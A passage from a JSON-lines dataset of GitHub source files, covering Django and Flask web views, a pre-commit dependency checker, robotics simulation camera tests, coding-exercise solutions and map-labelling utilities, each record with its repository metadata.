kwargs['operands'] = _formula_column_operands\n kwargs['columns'] = self.workflow.columns.all()\n return kwargs\n\n def form_valid(self, form):\n column = form.save(commit=False)\n try:\n services.add_formula_column(\n self.request.user,\n self.workflow,\n column,\n form.cleaned_data['op_type'],\n form.selected_columns)\n form.save_m2m()\n except OnTaskServiceException as exc:\n exc.message_to_error(self.request)\n exc.delete()\n\n return http.JsonResponse({'html_redirect': ''})\n\n\nclass ColumnRandomAddView(ColumnBasicView, ColumnView, generic.CreateView):\n \"\"\"Create a column with random values (Modal).\"\"\"\n\n form_class = forms.RandomColumnAddForm\n template_name = 'column/includes/partial_random_add.html'\n\n def get_form_kwargs(self):\n \"\"\"Add the workflow and other params to the kwargs.\"\"\"\n kwargs = super().get_form_kwargs()\n kwargs['workflow'] = self.workflow\n kwargs['allow_interval_as_initial'] = True\n return kwargs\n\n def form_valid(self, form):\n column = form.save(commit=False)\n column.workflow = self.workflow\n column.is_key = False\n column.save()\n\n try:\n services.add_random_column(\n self.request.user,\n self.workflow, column)\n form.save_m2m()\n except services.OnTaskColumnIntegerLowerThanOneError as exc:\n form.add_error(exc.field_name, str(exc))\n return http.JsonResponse({\n 'html_form': render_to_string(\n 'column/includes/partial_random_add.html',\n {'form': form},\n request=self.request),\n })\n except OnTaskServiceException as exc:\n exc.message_to_error(self.request)\n exc.delete()\n except Exception as exc:\n messages.error(\n self.request,\n _('Unable to add random column: {0}').format(str(exc)))\n\n # The form has been successfully processed\n return http.JsonResponse({'html_redirect': ''})\n\n\nclass ColumnEditView(ColumnBasicView, ColumnView, generic.UpdateView):\n \"\"\"Edit and update a column.\"\"\"\n\n form_class = None\n template_name = None\n\n def get_form_kwargs(self):\n \"\"\"Add the workflow and other params to the kwargs.\"\"\"\n kwargs = super().get_form_kwargs()\n kwargs['workflow'] = self.workflow\n return kwargs\n\n def get_context_data(self, **kwargs):\n \"\"\"Insert is_question and add values.\"\"\"\n context = super().get_context_data(**kwargs)\n context['add'] = False\n return context\n\n def form_valid(self, form):\n if not form.has_changed():\n return http.JsonResponse({'html_redirect': None})\n\n column = form.save(commit=False)\n services.update_column(\n self.request.user,\n self.workflow,\n column,\n form.old_name,\n form.old_position)\n form.save_m2m()\n\n # Done processing the correct POST request\n return http.JsonResponse({'html_redirect': ''})\n\n\nclass ColumnDeleteView(ColumnBasicView, ColumnView, generic.DetailView):\n \"\"\"Delete a column.\"\"\"\n\n template_name = 'column/includes/partial_delete.html'\n wf_pf_related = ['actions', 'conditions', 'views']\n\n def get_context_data(self, **kwargs):\n \"\"\"Insert is_question and add values.\"\"\"\n context = super().get_context_data(**kwargs)\n context.update({\n # Get the conditions that need to be deleted\n 'cond_to_delete': [\n cond for cond in self.workflow.conditions.all()\n if self.object in cond.columns.all()],\n\n # Get the action filters that need to be deleted\n 'action_filter_to_delete': [\n action for action in self.workflow.actions.all()\n if\n action.filter and self.object in action.filter.columns.all()],\n\n # Get the views with filters that need to be deleted\n 'view_filter_to_delete': [\n view for view in self.workflow.views.all()\n if view.filter and self.object in view.filter.columns.all()]})\n return context\n\n def post(self, request, *args, **kwargs):\n column = self.get_object()\n services.delete_column(self.request.user, self.workflow, column)\n\n # There are various points of return\n from_url = self.request.META['HTTP_REFERER']\n if from_url.endswith(reverse('table:display')):\n return http.JsonResponse(\n {'html_redirect': reverse('table:display')})\n\n return http.JsonResponse({'html_redirect': reverse('column:index')})\n\n\nclass ColumnCloneView(ColumnBasicView, ColumnView, generic.DetailView):\n \"\"\"Clone a column in the table attached to a workflow.\"\"\"\n\n template_name = 'column/includes/partial_clone.html'\n\n def post(self, request, *args, **kwargs):\n # Proceed to clone the column\n column = self.get_object()\n try:\n services.clone_column(request.user, column)\n except Exception as exc:\n messages.error(\n request,\n _('Unable to clone column: {0}').format(str(exc)))\n return http.JsonResponse({'html_redirect': ''})\n\n return http.JsonResponse({'html_redirect': ''})\n","repo_name":"abelardopardo/ontask_b","sub_path":"ontask/column/views/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":11962,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"48"} +{"seq_id":"73824513425","text":"a = int(input())\n\nanswers = []\nfor x in range(a):\n n = int(input())\n ans = 0\n for y in range(1,n):\n ans += 1\n answers.append(str(ans))\n\nprint('\\n'.join(answers))\n","repo_name":"arjun921/Python-TIL","sub_path":"dailyPrograms/2018/4/2/201842.py","file_name":"201842.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42263624123","text":"from dataclasses import asdict, dataclass\n\n\n@dataclass(frozen=False, order=False)\nclass Result:\n total: float\n score: int\n corads: int\n sections: dict\n drawable: dict\n\n def _calculate_damage_score(self, damage) -> int:\n \"\"\"\n Returns a score from 0 - 5 according to the provided damage percentage\n \"\"\"\n if damage < 17.9:\n return 0\n\n points = 0\n score_table = (1, 5, 25, 50, 75, 100)\n try:\n while damage > score_table[points]:\n points += 1\n except IndexError:\n if damage > 100:\n return 5\n return 0\n return points\n\n def _get_corads(self, value: int) -> int:\n \"\"\"\n Returns a CORADS score for a value\n \"\"\"\n corads = (0, 21, 21, 21, 25, 100)\n for i, limit in enumerate(corads):\n if value < limit:\n return i\n\n def _get_damage_scores(self, ratios, frames) -> list:\n result = []\n result.append(ratios[0])\n result.append(ratios[2])\n result.append(ratios[4])\n\n new_area = sum(frames[:2])\n try:\n percentA = round(frames[0] / new_area, 5)\n percentB = round(frames[1] / new_area, 5)\n result.append(\n round((ratios[1] * percentA) + (ratios[3] * percentB), 5)\n )\n except ZeroDivisionError:\n result.append(0)\n\n result.append(ratios[5])\n return result\n\n def __init__(\n self,\n result: float,\n sections: list,\n distribution: list,\n frames: list,\n ratios: list,\n ) -> None:\n damages = self._get_damage_scores(ratios, frames)\n scores = []\n for section in damages:\n score = self._calculate_damage_score(section)\n scores.append(score)\n\n self.total = round(result, 5)\n self.score = sum(scores)\n self.corads = self._get_corads(self.total)\n self.sections = {\"damage\": damages, \"scores\": scores}\n self.drawable = {\"damage\": sections, \"distribution\": distribution}\n\n def __str__(self) -> str:\n return str(asdict(self))\n","repo_name":"catneep/covyx","sub_path":"Models/Results.py","file_name":"Results.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20000315257","text":"import unittest\nimport test_code\n\n\nclass test_module_equal(unittest.TestCase):\n\n def test_remainder_equal(self):\n result = test_code.find_remainder(10, 2)\n self.assertEqual(result, 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"tabish-dev/Assignment_1-SQA","sub_path":"test_module_equal.py","file_name":"test_module_equal.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2911630201","text":"def main():\n # prompts the user to take input\n percent = convert(input(\"Fractions: \"))\n print(f'{gauge(percent)}')\n\n\ndef convert(fraction):\n while True:\n try:\n operand1, operand2 = fraction.split('/')\n num1 = int(operand1)\n num2 = int(operand2)\n return num1 * 100 / num2\n except ValueError:\n raise ValueError\n except ZeroDivisionError:\n raise ZeroDivisionError\n\n\ndef gauge(percentage):\n if 0 <= percentage <= 1:\n return 'E'\n elif 99 <= percentage <= 100:\n return 'F'\n elif 1 < percentage < 99:\n return f'{round(percentage)}%'\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Always4ukittu/CS50","sub_path":"CS50p/test_fuel/fuel.py","file_name":"fuel.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5163951060","text":"\"\"\"\nFind a pair with the given sum in an array.\nGiven an unsorted integer array, find a pair with the given sum in it.\n\nExample:-\n \nInput:\n\nnums = [8, 7, 2, 5, 3, 1]\ntarget = 10\n \nOutput:\n \nPair found (8, 2)\nor\nPair found (7, 3)\n\nInput:\n\nnums = [5, 2, 6, 8, 1, 9]\ntarget = 12\n \nOutput: Pair not found\n\n\"\"\"\n\n# Brute force approach\n\n\ndef findPair(nums, target):\n\n # Consider each element expect last element\n for i in range(len(nums) - 1):\n\n # Start the i'th element until the last element\n for j in range(i+1, len(nums)):\n\n # If desired sum is found\n if nums[i] + nums[j] == target:\n print(\"Pair found\", (nums[i], nums[j]))\n return\n\n print(\"Pair not found\")\n\n\nif __name__ == \"__main__\":\n\n # nums = [8, 7, 2, 5, 3, 1]\n # target = 10\n\n # nums = [5, 2, 6, 8, 1, 9]\n # target = 12\n\n nums = [37, 99, 23, 46]\n target = 60\n\n findPair(nums, target)\n\n# Time complexity:- o(n^2)\n# Space complexity:- o(1)\n\n# -----------------------------------------------------------------------------------\n\n# Using sorting method, where we will maintain to pointers low and high.\n\n\ndef findPair(nums, target):\n\n # sort the array in ascending order\n nums.sort()\n\n # maintain two pointer low and high\n low, high = 0, len(nums) - 1\n\n # loop till the search space is exhausted\n while low < high:\n if nums[low] + nums[high] == target:\n print('Pair found', (nums[low], nums[high]))\n return\n\n # increment 'low' if the total is less than the desired sum\n # decrement 'high' if the total is more than the desired sum\n if nums[low] + nums[high] < target:\n low += 1\n else:\n high -= 1\n\n print(\"Pair not found\")\n\n\nif __name__ == \"__main__\":\n\n nums = [8, 7, 2, 5, 3, 1]\n target = 10\n\n # nums = [5, 2, 6, 8, 1, 9]\n # target = 12\n\n # nums = [37, 99, 23, 46]\n # target = 60\n\n findPair(nums, target)\n\n # Time complexity:- o(n.log(n))\n # Space complexity:- o(1)\n\n#\n","repo_name":"rahulpandey70/LeetCode-Questions","sub_path":"Topics/array/FindAPairWithGivenSum.py","file_name":"FindAPairWithGivenSum.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"24447151641","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom products.views import product_detail\n\n\nurlpatterns = [\n path('api-auth/', include('rest_framework.urls')),\n path('rest-auth/', include('rest_auth.urls')),\n path('rest-auth/registration/', include('rest_auth.registration.urls')),\n path('admin/', admin.site.urls),\n path('api/', include('articles.api.urls')),\n # product detail view\n path('', product_detail, name='detail')\n]\n","repo_name":"jdlee6/django-react-app","sub_path":"backend/src/djreact/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20515837691","text":"import logging\nimport traceback\nfrom pre_commit_hook.colors import red, soft_white, reset\nfrom pre_commit_hook.configs import version\nfrom pre_commit_hook.dependencies import check_dependencies\nfrom pre_commit_hook.errors import UserError, RepoError, CheckDependenciesError\nfrom pre_commit_hook.git import get_repository, get_user\nfrom pre_commit_hook.tmp_file import save_on_tmp\nfrom pre_commit_hook.utils import generate_uuid\n\nlogger = logging.getLogger(\"pre-commit\")\n\n\ndef main():\n \"\"\"\n Analyze dependency versions and report if there are new versions\n When check skipped is True, this always returns 0.\n \"\"\"\n exit_code = 0\n check_skipped = False\n uuid = None\n repo = None\n result = \"\"\n try:\n uuid = generate_uuid()\n email = get_user()\n repo = get_repository()\n result = check_dependencies()\n if result != \"\":\n print(f\"{soft_white}*** These dependencies must be updated ***\\n\\n{result}{reset}\")\n except UserError as err:\n exit_code = 1\n logger.error(\"[repo:%s][check_skipped:%s][exit_code:%s][uuid:%s][error:%s]\", repo, check_skipped, exit_code, uuid, err)\n print(f\"{red}No user was found. Please set up your user email with `git config user.email ...` or with --global to set it globally.{reset}\")\n except RepoError as err:\n exit_code = 2\n logger.error(\"[repo:%s][check_skipped:%s][exit_code:%s][uuid:%s][error:%s]\", repo, check_skipped, exit_code, uuid, err)\n print(f\"{red}No repository was found. Please set up your repository url with `git config remote.origin.url `.{reset}\")\n except CheckDependenciesError as err:\n exit_code = 3\n logger.error(\"[repo:%s][check_skipped:%s][exit_code:%s][uuid:%s][error:%s]\", repo, check_skipped, exit_code, uuid, err)\n print(f\"{red}There was an error checking dependencies versions.{reset}\")\n except Exception as err:\n exit_code = 4\n logger.error(\"[repo:%s][check_skipped:%s][exit_code:%s][uuid:%s][error:[msg:%s][type:%s][stack_trace:%s]]\", repo, check_skipped, exit_code, \n uuid, err, type(err).__name__, traceback.format_exc())\n print(f\"{red}There was an unexpected error processing your commit.\\nPlease contact us in slack channel #ops-it-team.{reset}\")\n finally:\n # if skip_check is TRUE or exit_code is 0, then the commit is NOT blocked, only on that case the file is created\n if exit_code == 0 or check_skipped:\n save_on_tmp(uuid, version, exit_code)\n if check_skipped:\n return 0\n return exit_code\n\n\nif __name__ == '__main__':\n raise SystemExit(main())\n","repo_name":"mastillisano/hook-test","sub_path":"pre_commit_hook/pre_commit.py","file_name":"pre_commit.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1962103239","text":"from dataclasses import dataclass, field\nfrom typing import Optional\nimport json\nimport re\n\n\n@dataclass\nclass HttpResponse:\n status_code: int\n headers: dict = field(default_factory=list)\n body: Optional[str] = None\n version: str = '1.0'\n\n def json(self):\n return json.loads(self.body)\n\n @staticmethod\n def from_str(message: str):\n lines = message.split('\\n')\n _, version, status_code, _ = re.split(r'HTTP/(.*) ([2-5][0-9]{2}) .*', lines[0])\n body = None\n headers = {}\n for num, line in enumerate(lines[1:]):\n if len(line.strip()) == 0:\n body = '\\n'.join(lines[num + 2:])\n break\n header = line[:line.index(':')]\n value = line[line.index(':') + 1:].strip()\n headers[header] = value\n return HttpResponse(status_code=int(status_code),\n headers=headers,\n body=body,\n version=version)\n","repo_name":"vessellook/2020-1-Atom-QA-Python-A-Vessellook","sub_path":"hw6/code/client/http_response.py","file_name":"http_response.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72767875346","text":"import numpy as np\n\nwith open('H:/Workspaces/Walk-Assistant/data/frames/annotation.txt', 'r') as f:\n lines = f.readlines()\n\ntext = ''\nfor index, line in enumerate(lines):\n if \"GOPR5068.MP4_2772.jpg\" in line:\n text = line\n\nprint(text)\n\nfile, encode = str(text).replace('\\n', '').split(',')\n\narr = []\nfor b in encode:\n arr.append(int(b))\n\narr = np.array(arr).reshape((9, 16))\n\nprint(arr)\n","repo_name":"YoongiKim/Walk-Assistant","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"48"} +{"seq_id":"38122479350","text":"def topKFrequent(nums, k: int):\n count = {}\n freq = [[] for i in range(len(nums) + 1)]\n\n for n in nums:\n count[n] = 1 + count.get(n, 0)\n for n, c in count.items():\n freq[c].append(n)\n\n res = []\n for i in range(len(freq) - 1, 0, -1):\n for n in freq[i]:\n res.append(n)\n if len(res) == k:\n return res\n#O(N)\nfrom collections import *\ndef topKFrequent1(nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n # Use Counter to extract the top k frequent elements\n # most_common(k) return a list of tuples, where the first item of the tuple is the element,\n # and the second item of the tuple is the count\n # Thus, the built-in zip function could be used to extract the first item from the tuples\n return map(list, zip(*Counter(nums).most_common(k))[0])\n\ndef test():\n test_cases = [\n {\n \"name\": \"simple case 1\",\n \"input\": [1,1,1,2,2,3],\n \"input1\": 2,\n \"expected\": [1,2]\n },\n {\n \"name\": \"simple case 2\",\n \"input\": [1],\n \"input1\": 1,\n \"expected\": [1]\n }\n ]\n\n for test_case in test_cases:\n assert test_case[\"expected\"] == topKFrequent(test_case[\"input\"], test_case[\"input1\"]), test_case[\"name\"]\n\nif __name__ == \"__main__\":\n from datetime import datetime\n start_time = datetime.now()\n test()\n print(\"Everything passed\")\n end_time = datetime.now()\n print('Duration: {}'.format(end_time - start_time))","repo_name":"0xspringtime/leetcode","sub_path":"0347.py","file_name":"0347.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17835430233","text":"from app import app\nfrom flask import jsonify\nfrom .constants import mongoClient, tokenLength\n\n@app.route('/api/v1/sincronizarDispositivo/', methods=['GET'])\ndef syncDevice(registrationToken):\n if len(registrationToken) is not tokenLength:\n #abort(404)\n jsonify({'code': -1, \"message\":\"El token introducido debe tener una longitud de seis caracteres.\"})\n\n if mongoClient[\"tmpPatientToken\"].count_documents({'id': registrationToken, 'synced': False}) > 0:\n mongoClient[\"tmpPatientToken\"].update_one({'id': registrationToken}, {\"$set\": {'synced': True}})\n return jsonify({'code': 0, \"message\":u\"Paciente sincronizado correctamente.\"})\n \n elif mongoClient[\"tmpPatientToken\"].count_documents({'id': registrationToken, 'synced': True}) > 0:\n return jsonify({'code': 1, \"message\":u\"El token introducido ya ha sido usado por otro paciente.\"})\n \n else:\n return jsonify({'code': 2, \"message\":u\"El token introducido no es correcto.\"})","repo_name":"asdrgil/tfm-server","sub_path":"web/app/routesApi.py","file_name":"routesApi.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2526946894","text":"from django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name=\"home\"),\n path('profile/', views.studentProfile, name=\"profile\"),\n path('profile/kartu-peserta/', views.render_register_card_view, name=\"profile-card\"),\n path('profile/ayah/', views.ProfileView.as_view(), name=\"profile-ayah\"),\n path('profile/ibu/', views.MoatherProfileView.as_view(), name=\"profile-ibu\"),\n path('profile/siswa/', views.StudentProfileView.as_view(), name=\"profile-siswa\"),\n path('profile/wali/', views.GuardianProfileView.as_view(), name=\"profile-wali\"),\n path('profile/jurusan/', views.MajorStudentView.as_view(), name=\"jurusan-siswa\"),\n path('profile/berkas/', views.FilesStudentView.as_view(), name=\"berkas-siswa\"),\n]\n","repo_name":"supimadi/ppdb","sub_path":"primaseru/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74462183504","text":"import omni.kit.test\nimport numpy as np\nfrom omni.isaac.core import World\nfrom omni.isaac.core.utils.stage import create_new_stage_async, update_stage_async\nfrom omni.isaac.core.utils.semantics import add_update_semantics\nimport omni.isaac.core.utils.numpy.rotations as rot_utils\nfrom omni.isaac.core.objects import DynamicCuboid\nfrom omni.isaac.core.prims import XFormPrim\nfrom omni.isaac.sensor import Camera\nimport math\nimport asyncio\n\n\nclass TestCameraSensor(omni.kit.test.AsyncTestCase):\n # Before running each test\n async def setUp(self):\n await create_new_stage_async()\n self.my_world = World(stage_units_in_meters=1.0)\n await self.my_world.initialize_simulation_context_async()\n await update_stage_async()\n self.my_world.scene.add_default_ground_plane()\n self.cube_2 = self.my_world.scene.add(\n DynamicCuboid(\n prim_path=\"/new_cube_2\",\n name=\"cube_1\",\n position=np.array([5.0, 3, 1.0]),\n scale=np.array([0.6, 0.5, 0.2]),\n size=1.0,\n color=np.array([255, 0, 0]),\n )\n )\n\n self.cube_3 = self.my_world.scene.add(\n DynamicCuboid(\n prim_path=\"/new_cube_3\",\n name=\"cube_2\",\n position=np.array([-5, 1, 3.0]),\n scale=np.array([0.1, 0.1, 0.1]),\n size=1.0,\n color=np.array([0, 0, 255]),\n linear_velocity=np.array([0, 0, 0.4]),\n )\n )\n self.xform = self.my_world.scene.add(\n XFormPrim(\n prim_path=\"/World/rig\",\n name=\"rig\",\n position=np.array([5.0, 0.0, 5.0]),\n orientation=rot_utils.euler_angles_to_quats(np.array([0, -90, 0]), degrees=True),\n )\n )\n self.camera = self.my_world.scene.add(\n Camera(\n prim_path=\"/World/rig/camera\",\n name=\"camera\",\n position=np.array([0.0, 0.0, 25.0]),\n frequency=20,\n resolution=(256, 256),\n orientation=rot_utils.euler_angles_to_quats(np.array([0, 90, 0]), degrees=True),\n )\n )\n add_update_semantics(self.cube_2.prim, \"cube\")\n add_update_semantics(self.cube_3.prim, \"cube\")\n await update_stage_async()\n await update_stage_async()\n await self.my_world.reset_async()\n await update_stage_async()\n await update_stage_async()\n return\n\n # After running each test\n async def tearDown(self):\n self.camera = None\n self.my_world.clear_instance()\n await omni.kit.app.get_app().next_update_async()\n while omni.usd.get_context().get_stage_loading_status()[2] > 0:\n print(\"tearDown, assets still loading, waiting to finish...\")\n await asyncio.sleep(1.0)\n await omni.kit.app.get_app().next_update_async()\n return\n\n async def test_world_poses(self):\n position, orientation = self.camera.get_world_pose()\n self.assertTrue(np.isclose(position, [0, 0, 25], atol=1e-05).all())\n self.assertTrue(\n np.isclose(\n orientation, rot_utils.euler_angles_to_quats(np.array([0, 90, 0]), degrees=True), atol=1e-05\n ).all()\n )\n translation, orientation = self.camera.get_local_pose()\n self.assertTrue(np.isclose(translation, [20, 0, 5], atol=1e-05).all())\n self.assertTrue(\n np.isclose(\n orientation, rot_utils.euler_angles_to_quats(np.array([0, 180, 0]), degrees=True), atol=1e-05\n ).all()\n )\n self.camera.set_local_pose(\n translation=[0, 0, 25], orientation=rot_utils.euler_angles_to_quats(np.array([0, 180, 0]), degrees=True)\n )\n return\n\n async def test_local_poses(self):\n return\n\n async def test_projection(self):\n for i in range(100):\n await update_stage_async()\n points_2d = self.camera.get_image_coords_from_world_points(\n np.array([self.cube_3.get_world_pose()[0], self.cube_2.get_world_pose()[0]])\n )\n # visual inspection golden values\n print(points_2d)\n self.assertTrue(np.isclose(points_2d[0], [103.51783101, 250.41131911]).all())\n self.assertTrue(np.isclose(points_2d[1], [54.40569416, 5.34284676]).all())\n points_3d = self.camera.get_world_points_from_image_coords(points_2d, np.array([24.94, 24.9]))\n self.assertTrue(np.isclose(points_3d[0], [-4.99799372, 0.99959505, 0.06]).all())\n self.assertTrue(np.isclose(points_3d[1], [4.99999901, 2.99999974, 0.1]).all())\n return\n\n async def test_data_acquisition(self):\n for i in range(100):\n await update_stage_async()\n self.camera.resume()\n for annotator in [\n \"pointcloud\",\n \"normals\",\n \"motion_vectors\",\n \"occlusion\",\n \"distance_to_image_plane\",\n \"distance_to_camera\",\n \"bounding_box_2d_tight\",\n \"bounding_box_2d_loose\",\n \"semantic_segmentation\",\n \"instance_id_segmentation\",\n \"instance_segmentation\",\n ]:\n getattr(self.camera, \"add_{}_to_frame\".format(annotator))()\n # frequency is set to 20, rendering rate is set to 120, so do 6 updates to make sure always have a frame\n await update_stage_async()\n await update_stage_async()\n await update_stage_async()\n await update_stage_async()\n await update_stage_async()\n await update_stage_async()\n data = self.camera.get_current_frame()\n self.assertTrue(len(data[annotator]) > 0, f\"{annotator}\")\n getattr(self.camera, \"remove_{}_from_frame\".format(annotator))()\n await update_stage_async()\n data = self.camera.get_current_frame()\n self.assertTrue(annotator not in data.keys(), f\"{annotator}\")\n return\n\n async def test_properties(self):\n self.camera.set_focal_length(5.0)\n self.assertTrue(self.camera.get_focal_length() == 5.0)\n self.camera.set_focus_distance(0.01)\n self.assertTrue(math.isclose(self.camera.get_focus_distance(), 0.01, abs_tol=0.005))\n self.camera.set_lens_aperture(0.01)\n self.assertTrue(math.isclose(self.camera.get_lens_aperture(), 0.01, abs_tol=0.005))\n self.camera.set_horizontal_aperture(1.2)\n self.assertTrue(math.isclose(self.camera.get_horizontal_aperture(), 1.2, abs_tol=0.1))\n self.camera.set_vertical_aperture(1.2)\n self.assertTrue(math.isclose(self.camera.get_vertical_aperture(), 1.2, abs_tol=0.1))\n self.camera.set_clipping_range(1.0, 1.0e5)\n clipping_range = self.camera.get_clipping_range()\n self.assertTrue(math.isclose(clipping_range[0], 1.0, abs_tol=0.1))\n self.assertTrue(math.isclose(clipping_range[1], 1.0e5, abs_tol=0.1))\n self.camera.set_projection_type(\"fisheyeOrthographic\")\n self.assertTrue(self.camera.get_projection_type() == \"fisheyeOrthographic\")\n # TODO: this causes a segfault\n # self.camera.set_projection_mode(\"orthographic\")\n # self.assertTrue(self.camera.get_projection_mode() == \"orthographic\")\n self.camera.set_stereo_role(\"left\")\n self.assertTrue(self.camera.get_stereo_role() == \"left\")\n self.camera.set_fisheye_polynomial_properties(\n nominal_width=120,\n nominal_height=240,\n optical_centre_x=24,\n optical_centre_y=25,\n max_fov=560,\n polynomial=[1, 2, 3, 4, 5],\n )\n nominal_width, nominal_height, optical_centre_x, optical_centre_y, max_fov, polynomial = (\n self.camera.get_fisheye_polynomial_properties()\n )\n self.assertTrue(math.isclose(nominal_width, 120, abs_tol=2))\n self.assertTrue(math.isclose(nominal_height, 240, abs_tol=2))\n self.assertTrue(math.isclose(optical_centre_x, 24, abs_tol=2))\n self.assertTrue(math.isclose(optical_centre_y, 25, abs_tol=2))\n self.assertTrue(math.isclose(max_fov, 560, abs_tol=2))\n self.assertTrue(np.isclose(polynomial, [1, 2, 3, 4, 5]).all())\n self.camera.set_shutter_properties(delay_open=2.0, delay_close=3.0)\n delay_open, delay_close = self.camera.get_shutter_properties()\n self.assertTrue(math.isclose(delay_open, 2.0, abs_tol=0.1))\n self.assertTrue(math.isclose(delay_close, 3.0, abs_tol=0.1))\n self.camera.set_resolution((300, 300))\n resolution = self.camera.get_resolution()\n self.assertTrue(math.isclose(resolution[0], 300, abs_tol=0.1))\n self.assertTrue(math.isclose(resolution[1], 300, abs_tol=0.1))\n self.camera.get_aspect_ratio()\n self.camera.get_horizontal_fov()\n self.camera.get_vertical_fov()\n return\n","repo_name":"swadaskar/Isaac_Sim_Folder","sub_path":"exts/omni.isaac.sensor/omni/isaac/sensor/tests/test_camera_sensor.py","file_name":"test_camera_sensor.py","file_ext":"py","file_size_in_byte":8952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43518159362","text":"# 폴란드 왕자 구사과는 다음과 같은 수를 좋아한다.\r\n#\r\n# 0과 1로만 이루어져 있어야 한다.\r\n# 1이 적어도 하나 있어야 한다.\r\n# 수의 길이가 100 이하이다.\r\n# 수가 0으로 시작하지 않는다.\r\n# 예를 들어, 101은 구사과가 좋아하는 수이다.\r\n#\r\n# 자연수 N이 주어졌을 때, N의 배수 중에서 구사과가 좋아하는 수를 구하는 프로그램을 작성하시오.\r\n\r\nfrom collections import deque\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\ndef BFS(N):\r\n queue = deque([(1, \"1\")])\r\n visited = [False] * 20001\r\n visited[1] = True\r\n\r\n while queue:\r\n current_num, current_str = queue.popleft()\r\n # 만약 만들어진 현재 숫자가 N의 배수라면?\r\n if current_num % N == 0:\r\n return current_str\r\n # 만약 구사과가 좋아하는 수의 길이가 100을 넘어선다면?\r\n if len(current_str) > 100:\r\n return \"BRAK\"\r\n # 1을 뒤에 붙이는 경우\r\n if not visited[((current_num * 10) + 1) % N]:\r\n visited[((current_num * 10) + 1) % N] = True\r\n queue.append([(((current_num * 10) + 1) % N), current_str + \"1\"])\r\n # 0을 뒤에 붙이는 경우\r\n if not visited[(current_num * 10) % N]:\r\n visited[(current_num * 10) % N] = True\r\n queue.append([((current_num * 10) % N), current_str + \"0\"])\r\n return \"BRAK\"\r\n\r\nT = int(input())\r\nfor i in range(T):\r\n N = int(input().strip())\r\n print(BFS(N))","repo_name":"dnwls16071/PS_Baekjoon","sub_path":"8000~8999/8111.py","file_name":"8111.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23145151215","text":"#!/usr/bin/env python\n\n\"\"\"\nSome utilities for fetching open street map labels.\n\"\"\"\n\nimport cv2\nimport gdal\nimport json\nimport numpy as np\nimport shapely.geometry\n\n\ndef read_multipolygon(geojson_path, buffer_size=1e-5):\n \"\"\"\n Reads a geojson and converts the result into a Multipolygon\n \"\"\"\n geojson = json.load(open(geojson_path, \"r\"))\n geoms = []\n for feature in geojson[\"features\"]:\n geom = shapely.geometry.shape(feature[\"geometry\"])\n if geom.geom_type != \"Polygon\":\n geom = geom.buffer(buffer_size)\n geoms.append(geom)\n\n poly = shapely.ops.cascaded_union(\n shapely.geometry.MultiPolygon(geoms)\n )\n\n return shapely.geometry.MultiPolygon(geoms)\n\n\ndef im_bounds(path):\n \"\"\"\n Get the latitude and longitude coordinates for lower right and upper left\n corners of geotiff image\n \"\"\"\n gdal_obj = gdal.Open(path)\n ulx, xres, xskew, uly, yskew, yres = gdal_obj.GetGeoTransform()\n lrx = ulx + (gdal_obj.RasterXSize * xres)\n lry = uly + (gdal_obj.RasterYSize * yres)\n return {\"lr\": [lrx, lry], \"ul\": [ulx, uly]}\n\n\ndef raster_coords(coords, img_size, bbox):\n \"\"\"\n Convert original coordinates into indices in an image\n \"\"\"\n for j in [0, 1]:\n coords[:, j] -= bbox[\"lr\"][j]\n coords[:, j] *= (img_size[j] + 1) / (bbox[\"ul\"][j] - bbox[\"lr\"][j])\n coords[:, j] = img_size[j] - coords[:, j]\n\n return np.round(coords).astype(np.int32)\n\n\ndef multipoly_contours(polygon_list, img_size, bbox):\n \"\"\"\n Given a generic polygon, get coordinates for the contours\n \"\"\"\n if not polygon_list:\n return [], []\n\n to_ind = lambda x: np.array(list(x)).astype(np.float32)\n perim = [\n raster_coords(to_ind(poly.exterior.coords), img_size, bbox)\n for poly in polygon_list\n ]\n inter = [\n raster_coords(to_ind(poly.coords), img_size, bbox)\n for poly_ex in polygon_list for poly in poly_ex.interiors\n ]\n\n return perim, inter\n\n\ndef make_mask(contours, img_size, class_id=1):\n \"\"\"\n Generate a mask, given contours\n \"\"\"\n 